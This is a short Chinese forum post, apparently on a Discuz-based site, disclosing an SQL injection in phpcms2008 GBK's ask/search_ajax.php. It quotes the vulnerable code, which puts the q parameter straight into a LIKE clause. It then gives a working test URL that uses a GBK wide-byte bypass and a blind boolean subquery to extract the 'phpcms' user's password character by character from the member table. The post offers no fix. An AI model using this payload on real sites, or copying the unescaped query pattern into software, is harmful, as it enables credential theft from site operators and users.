受影响程序: phpcms2008 gbk 漏洞文件:ask/search_ajax.php require ‘./include/common.inc.php’; require_once MOD_ROOT.‘include/ask.class.php’; $ask = new ask(); header(‘Content-type: text/html; charset=utf-8′); if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q); if($q) { $where = “ title LIKE ’%$q%’ AND status = 5″; } else { exit(‘null’); } $infos = $ask->listinfo($where, ‘askid DESC’, ”, 10); foreach($infos as $key=>$val) { $val['title'] = str_replace($q, ‘’.$q.‘’, $val['title']); $info[$key]['title'] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val['title']) : $val['title']; $info[$key]['url'] = $val['url']; } echo(json_encode($info)); ?> 测试方法: ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23 |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-30 09:28 , Processed in 0.171594 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.